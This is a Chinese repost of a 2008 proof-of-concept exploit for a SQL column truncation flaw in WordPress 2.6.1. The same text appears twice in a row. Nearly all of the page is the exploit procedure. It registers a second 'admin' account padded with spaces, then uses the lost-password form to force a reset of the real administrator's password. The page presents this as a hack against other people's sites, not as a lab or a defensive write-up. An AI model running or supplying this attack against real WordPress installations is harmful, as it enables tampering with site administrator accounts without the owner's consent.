WordPress 2.6.1 SQL Column Truncation Vulnerability
来源:好再见网 2008-09-22 11:57:18
用wordpress的要注意了# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends1. go to url: server.com/wp-login.php?action=register2. register as:login: admin x
email: your email^ admin[55 space chars]xnow, we have duplicated 'admin' account in database3. go to url: server.com/wp-login.php?action=lostpassword4. write your email into field and submit this form5. check your email and go to reset confirmation link6. admin's password changed, but new password will be send to correct admin email ;/# milw0rm.com
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress.com/
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# in this hack we can remote change admin password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends1. go to url: server.com/wp-login.php?action=register2. register as:login: admin x
email: your email^ admin[55 space chars]xnow, we have duplicated 'admin' account in database3. go to url: server.com/wp-login.php?action=lostpassword4. write your email into field and submit this form5. check your email and go to reset confirmation link6. admin's password changed, but new password will be send to correct admin email ;/# milw0rm.com
本文标签:
上一篇 : 最受黑客喜欢的五种网络口令